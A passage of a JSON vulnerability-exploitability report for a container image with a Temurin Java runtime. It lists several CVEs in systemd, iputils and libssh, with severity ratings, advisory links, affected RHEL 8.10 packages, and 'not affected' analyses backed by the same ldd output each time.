        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-4598",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        364
      ],
      "description": "A vulnerability was found in systemd-coredump. This flaw allows an attacker to force a SUID process to crash and replace it with a non-SUID binary to access the original's privileged process coredump, allowing the attacker to read sensitive data, such as /etc/shadow content, loaded by the original process.\n\nA SUID binary or process has a special type of permission, which allows the process to run with the file owner's permissions, regardless of the user executing the binary. This allows the process to access more restricted data than unprivileged users or processes would be able to. An attacker can leverage this flaw by forcing a SUID process to crash and force the Linux kernel to recycle the process PID before systemd-coredump can analyze the /proc/pid/auxv file. If the attacker wins the race condition, they gain access to the original's SUID process coredump file. They can read sensitive content loaded into memory by the original binary, affecting data confidentiality.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-4598"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Jun/9"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/06/05/1"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/06/05/3"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/08/18/3"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:22660"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:22868"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23227"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23234"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:0414"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1652"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18153"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-4598"
        },
        {
          "url": "https://blogs.oracle.com/linux/post/analysis-of-cve-2025-4598"
        },
        {
          "url": "https://bugzilla.redhat.com/2369242"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369242"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://ciq.com/blog/the-real-danger-of-systemd-coredump-cve-2025-4598/"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4598"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-22660.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:22660"
        },
        {
          "url": "https://git.kernel.org/linus/b5325b2a270fcaf7b2a9a0f23d422ca8a5a8bdea"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/0c49e0049b7665bb7769a13ef346fef92e1ad4d6%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/13902e025321242b1d95c6d8b4e482b37f58cdef%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/49f1f2d4a7612bbed5211a73d11d6a94fbe3bb69%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/76e0ab49c47965877c19772a2b3bf55f6417ca39%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/868d95577ec9f862580ad365726515459be582fc%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/8fc7b2a211eb13ef1a94250b28e1c79cab8bdcb9%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/9ce8e3e449def92c75ada41b7d10c5bc3946be77%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/e6a8687b939ab21854f12f59a3cce703e32768cf%20%28main%29"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-4598.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18153.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00022.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4598"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7559-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-4598"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/05/29/3"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/08/18/3"
        },
        {
          "url": "https://www.qualys.com/2025/05/29/apport-coredump/apport-coredump.txt"
        }
      ],
      "published": "2025-05-30T14:15:23+00:00",
      "updated": "2026-06-30T11:16:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-47268",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "ping in iputils before 20250602 allows a denial of service (application error or incorrect data collection) via a crafted ICMP Echo Reply packet, because of a signed 64-bit integer overflow in timestamp multiplication.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-47268"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:9432"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-47268"
        },
        {
          "url": "https://bugzilla.redhat.com/2364090"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2364090"
        },
        {
          "url": "https://bugzilla.suse.com/show_bug.cgi?id=1242300"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47268"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-9432.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:9432"
        },
        {
          "url": "https://github.com/Zephkek/ping-rtt-overflow/"
        },
        {
          "url": "https://github.com/iputils/iputils/commit/070cfacd7348386173231fb16fad4983d4e6ae40"
        },
        {
          "url": "https://github.com/iputils/iputils/issues/584"
        },
        {
          "url": "https://github.com/iputils/iputils/pull/585"
        },
        {
          "url": "https://github.com/iputils/iputils/releases/tag/20250602"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-47268.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-9432.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47268"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7670-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-47268"
        }
      ],
      "published": "2025-05-05T14:15:29+00:00",
      "updated": "2026-06-17T09:27:38+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "20180629-11.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-4878",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.6,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A vulnerability was found in libssh, where an uninitialized variable exists under certain conditions in the privatekey_from_file() function. This flaw can be triggered if the file specified by the filename doesn't exist and may lead to possible signing failures or heap corruption.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-4878"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-4878"
        },
        {
          "url": "https://bugzilla.redhat.com/2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
